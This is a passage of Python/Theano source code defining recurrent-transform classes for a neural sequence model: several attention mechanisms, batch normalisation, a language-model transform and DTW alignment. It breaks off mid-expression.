None\n\n\nclass AttentionTest(RecurrentTransformBase):\n name = \"test\"\n\n def create_vars(self):\n n_out = self.layer.attrs['n_out']\n n_in = sum([e.attrs['n_out'] for e in self.layer.base])\n self.W_att_in = self.add_param(self.layer.create_random_uniform_weights(n=n_out, m=n_in, name=\"W_att_in\"))\n\n def step(self, y_p):\n z_re = T.dot(y_p, self.W_att_in)\n return z_re, {}\n\n\nclass DummyTransform(RecurrentTransformBase):\n name = \"none\"\n def step(self, y_p):\n return T.zeros((y_p.shape[0],y_p.shape[1]*4),dtype='float32'), {}\n\n\nclass DynamicTransform(RecurrentTransformBase):\n name = \"rnn\"\n def create_vars(self):\n self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n def step(self, y_p):\n return T.dot(y_p,self.W_re), {}\n\n\nclass BatchNormTransform(RecurrentTransformBase):\n name = \"batch_norm\"\n def create_vars(self):\n self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n dim = self.layer.unit.n_in\n self.sample_mean = self.add_param(theano.shared(numpy.zeros((dim,), 'float32')), \"sample_mean\")\n self.gamma = self.add_param(self.layer.shared(numpy.zeros((dim,), 'float32') + numpy.float32(0.1), \"gamma\"))\n #self.beta = self.add_param(self.layer.shared(numpy.zeros((dim,), 'float32'), \"beta\"))\n\n def batch_norm(self, h, use_shift=True, use_std=True, use_sample=0.0):\n x = h\n mean = T.mean(x, axis=0)\n std = T.std(x, axis=0)\n sample_std = T.sqrt(T.mean((x - self.sample_mean) ** 2, axis=0))\n if not self.layer.train_flag:\n use_sample = 1.0\n mean = T.constant(1. - use_sample, 'float32') * mean + T.constant(use_sample, 'float32') * self.sample_mean\n std = T.constant(1. - use_sample, 'float32') * std + T.constant(use_sample, 'float32') * sample_std\n mean = mean.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n std = std.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n bn = (h - mean) #/ (std + numpy.float32(1e-10))\n if use_std:\n bn *= self.gamma.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n #if use_shift:\n # bn += self.beta\n return bn\n\n def step(self, y_p):\n #return T.dot(y_p,self.W_re), {}\n return self.batch_norm(T.dot(y_p,self.W_re)), {}\n\n\nclass LM(RecurrentTransformBase):\n name = \"lm\"\n\n def create_vars(self):\n self.W_lm_in = self.add_var(self.layer.W_lm_in, name=\"W_lm_in\")\n self.W_lm_out = self.add_var(self.layer.W_lm_out, name=\"W_lm_out\")\n self.lmmask = self.add_var(self.layer.lmmask, \"lmmask\")\n self.t = self.add_state_var(T.zeros((1,), dtype=\"float32\"), name=\"t\")\n y = self.layer.y_in[self.layer.attrs['target']].flatten()\n if self.layer.attrs['droplm'] < 1.0 and (self.layer.train_flag or self.layer.attrs['force_lm']):\n eos = T.unbroadcast(self.W_lm_out[0].dimshuffle('x','x',0),1).repeat(self.layer.index.shape[1],axis=1)\n if self.layer.attrs['direction'] == 1:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[:-1] # (T-1)BD\n self.cls = T.concatenate([eos, y_t], axis=0)\n else:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[1:] # (T-1)BD\n self.cls = T.concatenate([eos,y_t[::-1]], axis=0)\n self.add_input(self.cls, 'cls')\n\n def step(self, y_p):\n result = 0\n updates = {}\n p_re = T.nnet.softmax(T.dot(y_p, self.W_lm_in))\n if self.layer.attrs['droplm'] < 1.0 and (self.layer.train_flag or self.layer.attrs['force_lm']):\n mask = self.lmmask[T.cast(self.t[0],'int32')]\n if self.layer.attrs['attention_lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)] * (1. - mask) + self.cls[T.cast(self.t[0],'int32')] * mask\n else:\n result += T.dot(p_re,self.W_lm_out) * (1. - mask) + self.cls[T.cast(self.t[0],'int32')] * mask\n else:\n if self.layer.attrs['attention_lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)]\n else:\n result += T.dot(p_re,self.W_lm_out)\n updates[self.t] = self.t + 1\n return result, updates\n\n\nclass AttentionBase(RecurrentTransformBase):\n base=None\n name = \"attention_base\"\n\n @property\n def attrs(self):\n return { \"_\".join(k.split(\"_\")[1:]) : self.layer.attrs[k] for k in self.layer.attrs.keys() if k.startswith(\"attention_\") }\n\n def create_vars(self):\n if self.base is None:\n self.base = self.layer.base\n self.n = self.add_state_var(T.zeros((self.layer.index.shape[1],), 'float32'), 'n')\n self.bound = self.add_input(T.cast(T.sum(self.layer.index,axis=0), 'float32'), 'bound')\n if self.attrs['norm'] == 'RNN':\n n_tmp = self.attrs['template']\n l = sqrt(6.) / sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, n_tmp*4)), dtype=theano.config.floatX)\n self.N_re = self.add_param(self.layer.shared(value=values, borrow=True, name = \"N_re\"))\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, 1)), dtype=theano.config.floatX)\n self.N_out = self.add_param(self.layer.shared(value=values, borrow=True, name = \"N_out\"))\n if self.attrs['distance'] == 'rnn':\n n_tmp = self.attrs['template']\n l = sqrt(6.) / sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, n_tmp)), dtype=theano.config.floatX)\n self.A_re = self.add_param(self.layer.shared(value=values, borrow=True, name = \"A_re\"))\n if self.attrs['distance'] == 'transpose':\n n_tmp = self.attrs['template']\n l = sqrt(6.) / sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp,)), dtype=theano.config.floatX)\n self.W_T = self.add_param(self.layer.shared(value=values, name=\"W_T\"))\n if self.attrs['lm'] != \"none\":\n self.W_lm_in = self.add_var(self.layer.W_lm_in, name=\"W_lm_in\")\n self.b_lm_in = self.add_var(self.layer.b_lm_in, name=\"b_lm_in\")\n self.W_lm_out = self.add_var(self.layer.W_lm_out, name=\"W_lm_out\")\n self.drop_mask = self.add_var(self.layer.lmmask, \"drop_mask\")\n y = self.layer.y_in[self.layer.attrs['target']].flatten()\n nil = T.unbroadcast(self.W_lm_out[0].dimshuffle('x','x',0),1).repeat(self.layer.index.shape[1],axis=1)\n if self.layer.attrs['direction'] == 1:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[:-1] # (T-1)BD\n self.cls = T.concatenate([nil, y_t], axis=0)\n else:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[1:] # (T-1)BD\n self.cls = T.concatenate([nil,y_t[::-1]], axis=0)\n self.add_input(self.cls, 'cls')\n\n def default_updates(self):\n self.base = self.layer.base\n self.glimpses = [ [] ] * len(self.base)\n self.n_glm = max(self.attrs['glimpse'],1)\n return { self.n : self.n + numpy.float32(1) } #T.constant(1,'float32') }\n\n def step(self, y_p):\n result = 0\n self.glimpses = []\n updates = self.default_updates()\n if self.attrs['lm'] != \"none\":\n p_re = T.nnet.softmax(T.dot(y_p, self.W_lm_in) + self.b_lm_in)\n if self.layer.attrs['droplm'] < 1.0:\n mask = self.drop_mask[T.cast(self.n[0],'int32')]\n if self.attrs['lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)] * (1. - mask) + self.cls[T.cast(self.n[0],'int32')] * mask\n else:\n result += T.dot(p_re,self.W_lm_out) * (1. - mask) + self.cls[T.cast(self.n[0],'int32')] * mask\n else:\n if self.attrs['lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)]\n else:\n result += T.dot(p_re,self.W_lm_out)\n inp, upd = self.attend(y_p)\n updates.update(upd)\n return result + inp, updates\n\n def distance(self, C, H):\n dist = self.attrs['distance']\n if H.ndim == 2:\n H = H.dimshuffle('x', 0, 1).repeat(C.shape[0],axis=0)\n assert H.ndim == 3\n if dist == 'l2':\n dst = T.sqrt(T.sum((C - H) ** 2, axis=2))\n elif dist == 'sqr':\n dst = T.mean((C - H) ** 2, axis=2)\n elif dist == 'dot':\n dst = T.sum(C * H, axis=2)\n elif dist == 'l1':\n dst = T.sum(T.abs_(C - H), axis=2)\n elif dist == 'cos': # use with template size > 32\n J = H / T.sqrt(T.sum(H**2,axis=2,keepdims=True))\n K = C / T.sqrt(T.sum(C**2,axis=2,keepdims=True))\n dst = T.sum(K * J, axis=2)\n elif dist == 'rnn':\n inp, _ = theano.scan(lambda x,p,W:elu(x+T.dot(p,W)), sequences = C, outputs_info = [H[0]], non_sequences=[self.A_re])\n dst = inp[-1]\n elif dist == 'transpose':\n dst = T.sum(self.W_T.dimshuffle('x','x',0).repeat(C.shape[0],axis=0).repeat(C.shape[1],axis=1) * T.tanh(C + H),axis=2)\n else:\n raise NotImplementedError()\n return dst #/ T.cast(H.shape[1],'float32')\n\n def beam(self, X, beam_idx=None):\n if not beam_idx:\n beam_idx = X.beam_idx\n input_shape = [X.shape[0] * X.shape[1]]\n if X.ndim == 3:\n input_shape.append(X.shape[2])\n Y = X.reshape(input_shape)[beam_idx].reshape((self.attrs['beam'],X.shape[1]))\n Y.beam_idx = beam_idx\n return Y\n\n def align(self, w_i, Q):\n dst = -T.log(w_i)\n inf = T.zeros_like(Q[0, 0]) + T.cast(1e10, 'float32') * T.gt(self.n, 0)\n big = T.cast(1e10, 'float32')\n n0 = T.eq(T.max(self.n), 0)\n D = -T.log(w_i)\n\n def dtw(i, q_p, b_p, Q, D, inf):\n i0 = T.eq(i, 0)\n # inf = T.cast(1e10,'float32') * T.cast(T.switch(T.eq(self.n,0), T.switch(T.eq(i,0), 0, 1), 1), 'float32')\n penalty = T.switch(T.and_(T.neg(n0), i0), big, T.constant(0.0, 'float32'))\n loop = T.constant(0.0, 'float32') + q_p\n forward = T.constant(0.0, 'float32') + T.switch(T.or_(n0, i0), 0, Q[i - 1])\n opt = T.stack([loop, forward])\n k_out = T.cast(T.argmin(opt, axis=0), 'int32')\n return opt[k_out, T.arange(opt.shape[1])] + D[i] + penalty, k_out\n\n output, _ = theano.scan(dtw, sequences=[T.arange(dst.shape[0], dtype='int32')], non_sequences=[Q, D, inf],\n outputs_info=[T.zeros((dst.shape[1],), 'float32'), T.zeros((dst.shape[1],), 'int32')])\n return output[0], T.cast(output[1],'float32')\n\n def softmax(self, D, I):\n D = D * T.constant(self.attrs['sharpening'], 'float32')\n if self.attrs['norm'] == 'exp':\n E = T.exp(-D) * I\n E = E / T.maximum(T.sum(E,axis=0,keepdims=True),T.constant(1e-20,'float32'))\n elif self.attrs['norm'] == 'sigmoid':\n E = (numpy.float32(1) - T.tanh(D)**2) * I\n elif self.attrs['norm'] == 'lstm':\n n_out = self.attrs['template']\n def lstm(z, i_t, s_p, h_p):\n z += T.dot(h_p, self.N_re)\n i = T.outer(i_t, T.alloc(numpy.cast['int8'](1), n_out))\n ingate = T.nnet.sigmoid(z[:,n_out: 2 * n_out])\n forgetgate = T.nnet.sigmoid(z[:,2 * n_out:3 * n_out])\n outgate = T.nnet.sigmoid(z[:,3 * n_out:])\n input = T.tanh(z[:,:n_out])\n s_t = input * ingate + s_p * forgetgate\n h_t = T.tanh(s_t) * outgate\n return theano.gradient.grad_clip(s_t * i, -50, 50), h_t * i\n E, _ = theano.scan(lstm, sequences=[D,I], outputs_info=[T.zeros((n_out,), 'float32'), T.zeros((n_out,), 'int32')])\n E = T.nnet.sigmoid(T.dot(E,self.N_out))\n else:\n raise NotImplementedError()\n if self.attrs['nbest'] > 1:\n opt = T.minimum(self.attrs['nbest'], E.shape[0])\n score = (T.sort(E, axis=0)[-opt]).dimshuffle('x',0).repeat(E.shape[0],axis=0)\n E = T.switch(T.lt(E,score), T.zeros_like(E), E)\n return E\n\n\nclass AttentionList(AttentionBase):\n \"\"\"\n attention over list of bases\n \"\"\"\n name = \"attention_list\"\n def init(self, i):\n if self.attrs['beam'] > 0:\n img = 0\n for b in range(self.attrs['beam']):\n img += T.eye(self.custom_vars['C_%d' % i].shape[0],self.custom_vars['C_%d' % i].shape[0],b,dtype='float32')\n self.__setattr__(\"P_%d\" % i, self.add_input(img, 'P_%d' %i))\n self.__setattr__(\"B_%d\" % i, self.custom_vars['B_%d' % i])\n if self.attrs['memory'] > 0:\n self.__setattr__(\"M_%d\" % i, self.state_vars['M_%d' % i])\n self.__setattr__(\"W_mem_in_%d\" % i, self.custom_vars['W_mem_in_%d' % i])\n self.__setattr__(\"W_mem_write_%d\" % i, self.custom_vars['W_mem_write_%d' % i])\n self.__setattr__(\"C_%d\" % i, self.custom_vars['C_%d' % i])\n self.__setattr__(\"I_%d\" % i, self.custom_vars['I_%d' % i])\n self.__setattr__(\"W_att_re_%d\" % i, self.custom_vars['W_att_re_%d' % i])\n self.__setattr__(\"b_att_re_%d\" % i, self.custom_vars['b_att_re_%d' % i])\n self.__setattr__(\"W_att_in_%d\" % i, self.custom_vars['W_att_in_%d' % i])\n self.__setattr__(\"b_att_in_%d\" % i, self.custom_vars['b_att_in_%d' % i])\n if 'b_att_bs_%d' % i in self.custom_vars.keys():\n self.__setattr__(\"W_att_bs_%d\" % i, self.custom_vars['W_att_bs_%d' % i])\n self.__setattr__(\"b_att_bs_%d\" % i, self.custom_vars['b_att_bs_%d' % i])\n shape = self.layer.base[i].output_index().shape\n if self.attrs['store']:\n self.__setattr__(\"att_%d\" % i, self.add_state_var(T.zeros(shape,'float32'), \"att_%d\" % i))\n if self.attrs['smooth']:\n self.__setattr__(\"datt_%d\" % i, self.add_state_var(T.zeros(shape, 'float32'), \"datt_%d\" % i))\n if self.attrs['align']:\n self.__setattr__(\"Q_%d\" % i, self.add_state_var(T.zeros(shape,'float32') + numpy.float32(1e10), \"Q_%d\" % i))\n self.__setattr__(\"K_%d\" % i, self.add_state_var(T.zeros(shape,'float32'), \"K_%d\" % i))\n if self.attrs['momentum'] == \"conv1d\":\n self.__setattr__(\"F_%d\" % i, self.custom_vars['F_%d' % i])\n self.__setattr__(\"U_%d\" % i, self.custom_vars['U_%d' % i])\n elif self.attrs['momentum'] == \"conv2d\":\n self.__setattr__(\"F_%d\" % i, self.custom_vars['F_%d' % i])\n self.__setattr__(\"U_%d\" % i, self.custom_vars['U_%d' % i])\n elif self.attrs['momentum'] == \"mono\":\n self.__setattr__(\"D_in_%d\" % i, self.custom_vars['D_in_%d' % i])\n self.__setattr__(\"D_out_%d\" % i, self.custom_vars['D_out_%d' % i])\n self.__setattr__(\"Db_out_%d\" % i, self.custom_vars['Db_out_%d' % i])\n if self.attrs['loss']:\n self.__setattr__(\"iatt_%d\" % i, self.custom_vars['iatt_%d' % i])\n self.__setattr__(\"catt_%d\" % i, self.add_state_var(T.zeros((shape[1],), 'float32'), \"catt_%d\" % i))\n\n def create_bias(self, n, name, i=-1):\n if i >= 0: name += '_%d' % i\n values = numpy.zeros((n,), dtype=theano.config.floatX)\n return self.add_param(self.layer.shared(value=values, borrow=True, name=name), name=name)\n\n def create_weights(self, n, m, name, i=-1):\n if i >= 0: name += '_%d' % i\n l = sqrt(6.) / sqrt(n + m)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n, m)), dtype=theano.config.floatX)\n return self.add_param(self.layer.shared(value=values, borrow=True, name=name), name=name)\n\n def create_vars(self):\n super(AttentionList, self).create_vars()\n n_tmp = self.attrs['template']\n direction = self.layer.attrs['direction']\n #self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n for i,e in enumerate(self.base):\n # base output\n B = e.output[::direction]\n self.add_input(B, 'B_%d' % i)\n # mapping from base output to template size\n self.create_weights(self.layer.attrs['n_out'], n_tmp, \"W_att_re\", i)\n self.create_bias(n_tmp, \"b_att_re\", i)\n if e.attrs['n_out'] == n_tmp:\n self.add_input(e.output[::direction], 'C_%d' % i)\n else:\n W_att_bs = self.create_weights(e.attrs['n_out'], n_tmp, \"W_att_bs\", i)\n b_att_bs = self.create_bias(n_tmp, \"b_att_bs\", i)\n h_att = T.tanh(T.dot(B, W_att_bs) + b_att_bs)\n if self.attrs['bn']:\n h_att = self.layer.batch_norm(h_att, n_tmp, index = e.output_index())\n else:\n i_f = T.cast(e.output_index(),'float32').dimshuffle(0,1,'x').repeat(h_att.shape[2],axis=2)\n h_att = h_att - (h_att * i_f).sum(axis=0,keepdims=True) / T.sum(i_f,axis=0,keepdims=True)\n if self.attrs['memory'] > 0:\n self.add_state_var(T.zeros((self.attrs['memory'], n_tmp), 'float32'), 'M_%d' % i)\n self.create_weights(n_tmp, self.layer.unit.n_in, \"W_mem_in\", i)\n self.create_weights(n_tmp, self.attrs['memory'], \"W_mem_write\", i)\n self.add_input(h_att, 'C_%d' % i)\n self.add_input(T.cast(self.base[i].output_index()[::direction], 'float32'), 'I_%d' % i)\n # mapping from template size to cell input\n self.create_weights(e.attrs['n_out'], self.layer.unit.n_in, \"W_att_in\", i)\n self.create_bias(self.layer.unit.n_in, \"b_att_in\", i)\n if self.attrs['momentum'] == 'conv1d':\n context = 5\n values = numpy.ones((self.attrs['filters'], 1, context, 1), 'float32')\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"F_%d\" % i))\n l = sqrt(6.) / sqrt(self.layer.attrs['n_out'] + n_tmp + self.layer.unit.n_re)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(self.attrs['filters'], n_tmp)), dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"U_%d\" % i))\n elif self.attrs['momentum'] == 'conv2d':\n context = 3\n values = numpy.ones((self.attrs['filters'], 1, 2, context), 'float32')\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"F_%d\" % i))\n l = sqrt(6.) / sqrt(self.attrs['filters'] + 1)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(self.attrs['filters'], 1)), dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"U_%d\" % i))\n elif self.attrs['momentum'] == \"mono\":\n size = 500\n l = 0.01\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(1, size)),\n dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"D_in_%d\" % i))\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(size, 1)),\n dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"D_out_%d\" % i))\n self.add_param(self.layer.shared(value=numpy.zeros((1,),'float32'), borrow=True, name=\"Db_out_%d\" % i))\n elif self.attrs['loss']:\n att = e.att - T.arange(e.att.shape[1]) * e.sources[0].index.shape[0] # NB\n self.add_input(T.cast(att,'float32'), 'iatt_%d' % i)\n self.init(i)\n\n def item(self, name, i):\n key = \"%s_%d\" % (name,i)\n return self.custom_vars[key] if key in self.custom_vars.keys() else self.state_vars[key]\n\n def get(self, y_p, i, g):\n W_att_re = self.item(\"W_att_re\", i)\n b_att_re = self.item(\"b_att_re\", i)\n B = self.item(\"B\", i)\n C = self.item(\"C\", i)\n I = self.item(\"I\", i)\n beam_size = T.minimum(numpy.int32(abs(self.attrs['beam'])), C.shape[0])\n loc = T.cast(T.maximum(T.minimum(T.sum(I,axis=0) * self.n / self.bound - beam_size / 2, T.sum(I,axis=0) - beam_size), 0),'int32')\n if self.attrs['beam'] > 0:\n beam_idx = (self.custom_vars[('P_%d' % i)][loc].dimshuffle(1,0).flatten() > 0).nonzero()\n I = I.reshape((I.shape[0]*I.shape[1],))[beam_idx].reshape((beam_size,I.shape[1]))\n C = C.reshape((C.shape[0]*C.shape[1],C.shape[2]))[beam_idx].reshape((beam_size,C.shape[1],C.shape[2]))\n B = B.reshape((B.shape[0]*B.shape[1],B.shape[2]))[beam_idx].reshape((beam_size,B.shape[1],B.shape[2]))\n if self.attrs['template'] != self.layer.unit.n_out:\n z_p = T.dot(y_p, W_att_re) + b_att_re\n else:\n z_p = y_p\n if self.attrs['momentum'] == 'conv1d':\n from theano.tensor.nnet import conv\n att = self.item('att', i)\n F = self.item(\"F\", i)\n v = T.dot(T.sum(conv.conv2d(border_mode='full',\n input=att.dimshuffle(1, 'x', 0, 'x'),\n filters=F).dimshuffle(2,3,0,1),axis=1)[F.shape[2]/2:-F.shape[2]/2+1],self.item(\"U\",i))\n v = I * v / v.sum(axis=0,keepdims=True)\n z_p += T.sum(C * v,axis=0)\n if g > 0:\n z_p += self.glimpses[i][-1]\n h_p = T.tanh(z_p)\n return B, C, I, h_p, self.item(\"W_att_in\", i), self.item(\"b_att_in\", i)\n\n def attend(self, y_p):\n inp, updates = 0, {}\n for i in range(len(self.base)):\n for g in range(self.n_glm):\n B, C, I, H, W_att_in, b_att_in = self.get(y_p, i, g)\n z_i = self.distance(C, H)\n w_i = self.softmax(z_i, I)\n if self.attrs['momentum'] == 'conv2d':\n F = self.item('F',i)\n context = F.shape[3]\n padding = T.zeros((2,context/2,C.shape[1]),'float32')\n att = T.concatenate([padding, T.stack([self.item('att',i), w_i]), padding],axis=1) # 2TB\n v_i = T.nnet.sigmoid(T.dot(T.nnet.conv2d(border_mode='valid',\n input=att.dimshuffle(2,'x',0,1), # B12T\n filters=F).dimshuffle(3,0,2,1),self.item('U',i)).reshape((C.shape[0],C.shape[1])))\n w_i *= v_i\n w_i = w_i / w_i.sum(axis=0, keepdims=True)\n elif self.attrs['momentum'] == 'mono': # gating function\n idx = T.arange(z_i.shape[0],dtype='float32').dimshuffle(0,'x').repeat(w_i.shape[1],axis=1) # TB\n d_i = idx - T.sum(self.item('att', i) * idx,axis=0,keepdims=True)\n f_i = T.nnet.sigmoid(T.dot(T.tanh(T.dot(d_i.dimshuffle(0,1,'x'), self.item('D_in', i))), self.item(\"D_out\", i)) + self.item('Db_out',i))[:,:,0]\n w_i = T.exp(-z_i) * f_i * I\n w_i = w_i / w_i.sum(axis=0, keepdims=True)\n self.glimpses[i].append(T.sum(C * w_i.dimshuffle(0,1,'x').repeat(C.shape[2],axis=2),axis=0))\n if self.attrs['smooth']:\n updates[self.state_vars['datt_%d' % i]] = w_i - self.state_vars['att_%d' % i]\n if self.attrs['store']:\n updates[self.state_vars['att_%d' % i]] = theano.gradient.disconnected_grad(w_i)\n if self.attrs['align']:\n Q,K = self.align(w_i,self.item(\"Q\", i))\n updates[self.state_vars['Q_%d' % i]] = Q\n updates[self.state_vars['K_%d' % i]] = K\n if self.attrs['memory'] > 0:\n M = self.item('M',i)\n z_r = self.distance(M, H)\n w_m = self.softmax(z_r, T.ones_like(M[0]))\n inp += T.dot(T.sum(w_m*M,axis=0), self.item('W_mem_in',i))\n v_m = T.nnet.sigmoid(T.dot(H, self.item('W_mem_write', i))).dimshuffle('x',0, 1).repeat(M.shape[0],axis=0)\n mem = H.dimshuffle('x',0,1).repeat(self.attrs['memory'],axis=0)\n updates[self.state_vars['M_%d' % i]] = T.sum((numpy.float32(1) - v_m) * M.dimshuffle(0,'x',1).repeat(v_m.shape[1],axis=1) + v_m * mem,axis=1)\n if self.attrs['accumulator'] == 'rnn':\n def rnn(x_t, w_t, c_p):\n c = x_t * w_t + c_p * (numpy.float32(1.) - w_t)\n return T.switch(T.ge(c, 0), c, T.exp(c) - 1)\n zT, _ = theano.scan(rnn, sequences=[B,w_i.dimshuffle(0, 1, 'x').repeat(B.shape[2], axis=2)],\n outputs_info = [T.zeros_like(B[0])])\n z = zT[-1]\n else:\n if self.attrs['nbest'] == 1:\n z = B[T.argmax(w_i,axis=0),T.arange(w_i.shape[1])]\n else:\n z = T.sum(B * w_i.dimshuffle(0, 1, 'x').repeat(B.shape[2], axis=2), axis=0)\n if self.attrs['loss']:\n updates[self.state_vars['catt_%d' % i]] = -T.sum(T.log(w_i[T.cast(self.item('iatt', i),'int32')[T.cast(self.n,'int32')],T.arange(w_i.shape[1],dtype='int32')]),axis=0)\n inp += T.dot(z, W_att_in) + b_att_in\n ifelse(T.eq(T.mod(self.n[0],self.attrs['ndec']),0), inp, T.zeros((self.n.shape[0],self.layer.attrs['n_out'] * 4),'float32'))\n return inp, updates\n\n def cost(self):\n val = 0\n if self.attrs['smooth']:\n penalty = T.constant(0,'float32')\n for i in range(len(self.base)):\n penalty += theano.tensor.extra_ops.cumsum(self.get_state_vars_seq(self.state_vars['datt_%d' % i]),axis=0)\n val += T.sum(T.maximum(penalty,T.zeros_like(penalty)))\n if self.attrs['loss']:\n for i in range(len(self.base)):\n val += T.sum(self.get_state_vars_seq(self.state_vars['catt_%d' % i]))\n return val\n\n\nclass AttentionTime(AttentionList):\n \"\"\"\n Concatenate time-aligned base element into single list element\n \"\"\"\n name = \"attention_time\"\n def make_base(self):\n self.base = [T.concatenate([b.output[::b.attrs['direction']] for b in self.layer.base], axis=2)]\n self.base[0].index = self.layer.base[0].index\n self.base[0].output = self.base[0]\n self.base[0].attrs = { 'n_out' : sum([b.attrs['n_out'] for b in self.layer.base]), 'direction' : 1 }\n\n def create_vars(self):\n self.make_base()\n super(AttentionTime, self).create_vars()\n\n def default_updates(self):\n self.make_base()\n self.glimpses = [ [] ] * len(self.base)\n self.n_glm = max(self.attrs['glimpse'],1)\n return { self.n : self.n + T.constant(1,'float32') }\n\n\nclass AttentionTree(AttentionList):\n \"\"\"\n attention over hierarchy of bases in different time resolutions\n \"\"\"\n name = \"attention_tree\"\n def attend(self, y_p):\n B = self.custom_vars['B_0']\n for g in range(self.n_glm):\n prev = []\n for i in range(len(self.base)-1,-1,-1):\n B, C, I, H, W_att_in, b_att_in = self.get(y_p, i, g)\n h_p = sum([h_p] + prev) / T.constant(len(self.base)-i,'float32')\n w = self.softmax(self.distance(C, h_p), I)\n prev.append(T.sum(C * w.dimshuffle(0,1,'x').repeat(C.shape[2],axis=2),axis=0))\n self.glimpses[i].append(prev[-1])\n return T.dot(T.sum(B * w.dimshuffle(0,1,'x').repeat(B.shape[2],axis=2),axis=0), self.custom_vars['W_att_in_0']), {}\n\n\nclass AttentionBin(AttentionList):\n \"\"\"\n pruning of hypotheses in base[0] by attending over versions in time lower resolutions\n \"\"\"\n name = \"attention_bin\"\n\n def attend(self, y_p):\n updates = self.default_updates()\n for g in range(self.attrs['glimpse']):\n for i in range(len(self.base)-1,-1,-1):\n factor = T.constant(self.base[i].attrs['factor'][0], 'int32') if i > 0 else 1\n B, C, I, H, W_att_in, b_att_in = self.get(y_p, i, g)\n if i == len(self.base) - 1:\n z_i = self.distance(C, H)\n else:\n length = T.cast(T.max(T.sum(I,axis=0))+1,'int32')\n ext = T.cast(T.minimum(ext/factor,T.min(length)),'int32')\n def pick(i_t, ext):\n pad = T.minimum(i_t+ext, B.shape[0]) - ext\n return T.concatenate([T.zeros((pad,), 'int8'), T.ones((ext,), 'int8'), T.zeros((B.shape[0]-pad-ext+1,), 'int8')], axis=0)\n idx, _ = theano.map(pick, sequences = [pos/factor], non_sequences = [ext])\n idx = (idx.dimshuffle(1,0)[:-1].flatten() > 0).nonzero()\n C = C.reshape((C.shape[0]*C.shape[1],C.shape[2]))[idx].reshape((ext,C.shape[1],C.shape[2]))\n z_i = self.distance(C, H)\n I = I.reshape((I.shape[0]*I.shape[1],))[idx].reshape((ext,I.shape[1]))\n if i > 0:\n pos = T.argmax(self.softmax(z_i,I),axis=0) * factor\n ext = factor\n else:\n w_i = self.softmax(z_i,I)\n B = B.reshape((B.shape[0]*B.shape[1],B.shape[2]))[idx].reshape((ext,B.shape[1],B.shape[2]))\n proto = T.sum(B * w_i.dimshuffle(0,1,'x').repeat(B.shape[2],axis=2),axis=0)\n for i in range(len(self.base)):\n self.glimpses[i].append(proto)\n return T.dot(proto, self.custom_vars['W_att_in_0']), updates\n\n\nclass AttentionTimeGauss(RecurrentTransformBase):\n name = \"attention_time_gauss\"\n\n def create_vars(self):\n layer = self.layer\n base = layer.base\n assert base, \"attention networks are only defined for decoder networks\"\n\n n_out = layer.attrs['n_out']\n n_in = sum([e.attrs['n_out'] for e in base])\n src = [e.output for e in base]\n\n if len(src) == 1:\n self.B = src[0]\n else:\n self.B = T.concatenate(src, axis=2) # base (output of encoder). (time,batch,encoder-dim)\n self.add_input(self.B, name=\"B\")\n self.B_index = self.layer.base[0].index # not an input\n self.B_times = self.add_input(T.cast(T.sum(self.B_index, axis=0), dtype=\"float32\"), \"B_times\") # float32 for gpu\n\n self.W_att_re = self.add_param(layer.create_random_uniform_weights(n=n_out, m=2, p=n_out, name=\"W_att_re\"))\n self.b_att_re = self.add_param(layer.create_bias(2, name='b_att_re'))\n self.W_att_in = self.add_param(layer.create_random_uniform_weights(n=n_in, m=n_out * 4, name=\"W_att_in\"))\n self.W_state_in = self.add_param(layer.create_random_uniform_weights(n=3, m=n_out * 4, name=\"W_state_in\"))\n\n self.c = self.add_state_var(T.constant(0, dtype=\"float32\"), name=\"c\") # float32 for gpu\n self.t = self.add_state_var(T.zeros((self.B.shape[1],), dtype=\"float32\"), name=\"t\") # (batch,)\n\n def step(self, y_p):\n # y_p is (batch,n_out)\n # B is (time,batch,n_in)\n # B_index is (time,batch)\n attribs = self.layer.attrs[\"recurrent_transform_attribs\"]\n n_batch = self.B.shape[1]\n dt_min = T.constant(attribs.get(\"dt_min\", 0.5), dtype=\"float32\")\n dt_max = T.constant(attribs.get(\"dt_max\", 1.5), dtype=\"float32\")\n std_min = T.constant(attribs.get(\"std_min\", 1), dtype=\"float32\")\n std_max = T.constant(attribs.get(\"std_max\", 2), dtype=\"float32\")\n n_beam = T.constant(attribs.get(\"beam\", 20), dtype=\"float32\")\n B_times = self.B_times\n\n b = self.b_att_re.dimshuffle('x', 0) # (batch,2)\n a = T.nnet.sigmoid(T.dot(y_p, self.W_att_re) + b) # (batch,2)\n dt = dt_min + a[:, 0] * (dt_max - 